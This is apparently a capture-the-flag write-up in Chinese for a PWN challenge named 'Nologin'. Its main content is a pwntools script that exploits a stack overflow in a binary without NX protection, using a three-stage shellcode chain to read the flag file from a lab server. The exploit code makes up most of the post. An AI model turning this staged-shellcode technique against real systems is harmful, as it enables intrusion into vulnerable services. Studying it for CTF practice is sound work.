[PWN] Nologin - xf1les xp0int Posted on Sep 12 2021 user 存在栈溢出。程序没有开 NX,可以在栈上执行 shellcode。栈上能写 shellcode 的空间很小,只有 8 byte。 第一段 shellcode 利用 sub_40095D 将第两段 shellcode 写到栈上,然后转跳到第两段 shellcode。第两段 shellcode 最大长度是 16 bytes。 第两段 shellcode 和第一段 shellcode 类似,把第三段 shellcode 写到栈上。最后通过第三段 shellcode 读 flag。 ``` #!/usr/bin/env python3 from pwn import * warnings.filterwarnings("ignore", category=BytesWarning) context(arch="amd64") context(log_level="debug") context.proxy="127.0.0.1" p = remote("192.168.40.193", 40001) # ~ p = process("./nologin") p.sendlineafter(">", "2") ## 1st shellcode ## This shellcode is used to load 2nd shellcode from user input by sub_40095D s=""" push rax pop rdi // 0x40095D mov ebx, [rsp] call rbx nop """ ## rax is pointing to 1st shellcode on stack jmp_rax = 0x400851 p.sendlineafter("password:", b'A'*5 + asm(s) + p64(jmp_rax) + p64(0x40095D)) ## 2nd shellcode ## This shellcode is used to load 3rd shellcode from user input ## It will be overwritten by 3rd shellcode later by read syscall. s=""" // avoid shellcode being corrupted by pop, push instruction xchg rsp, r13 // 0x246 push r11 pop rdx // 0, SYS_read push r10 pop rax syscall """ ## rsp is pointing to 2nd shellcode jmp_rsp = 0x4016fb p.sendlineafter("password:", b'A'*0x8 + p64(jmp_rsp) + asm(s)) ## 3rd shellcode s=""" mov rax, 0x67616c66 push rax mov rdi, rsp xor rsi, rsi mov rax, SYS_open syscall mov rdi, 1 xchg rsi, rax xor rdx, rdx mov r10, 0x80 mov rax, SYS_sendfile syscall """ p.sendline(b"\x90"*0x30 + asm(s) + b"\x90"*0x30) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [RE] OddCode - cew [PWN] Whats your name - xf1les
没有帐号? 立即注册